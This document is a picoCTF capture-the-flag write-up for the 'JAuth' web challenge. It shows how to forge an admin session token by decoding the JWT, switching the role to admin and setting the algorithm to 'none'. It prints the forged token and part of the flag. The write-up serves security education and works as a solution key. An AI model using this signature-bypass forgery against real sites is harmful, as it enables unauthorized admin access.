picoCTF SolutionsChallenge library
picoGym ExclusiveWeb ExploitationMedium

JAuth

Challenge Overview

Description
Most web application developers use third party components

without testing their security. Some of the past affected

companies are:

  • Equifax (a US credit bureau organization) - breach due to

    unpatched Apache Struts web framework CVE-2017-5638
  • Mossack Fonesca (Panama Papers law firm) breach -

    unpatched version of Drupal CMS used
  • VerticalScope (internet media company) - outdated

    version of vBulletin forum software used

Can you identify the components and exploit the

vulnerable one?

The website is running here. Can you become an admin?

You can login as test with the password Test123! to get

started.

Solution

To start you can go to the developer tools, then application, the cookies to see the cookies for the site. After logging in with the test credentials a new JWT (JSON Web Token) cookie.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ.Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU

The . is the seperator so it can be seen that there are three parts. First being the header, then the payload, then lastly the signature. Since they are in base64 it could be decoded with CyberChef.

Part 1:

Base64: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

Decoded: {"typ":"JWT","alg":"HS256"}

Part 2:

Base64: eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ

Decoded: {"auth":1709617553088,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36","role":"user","iat":1709617553}

Part 3:

Base64: Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU

Decoded: Z§ ٌ&é“Óí·àlÓYa½B7U‡8nûïaÞ

The last part is hashed (HS256) which is why it outputs a weird value.

By taking the second part's decoded version and putting it into cyberchef to encode while changing the role from user to admin you can get a changed cookie value. For the first part you have the alg set to HS256 which is what creates the third part. By setting that to none we then don't have to worry about the third part and could leave it blank. So just take the first part's decoded output and change HS256 to none then re-encode with base64.

By then reconstructing and putting the parts back together you can get the full JWT cookie back with admin role. Be careful to remove any "=" padding with base64 because it is ignored with JWT tokens.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTcwOTYxNzU1M30.

When you change the cookie value to the modified cookie and refresh the page you get the flag.

Flag: picoCTF{succ3ss_@u7h3nt1c@710...4eacf}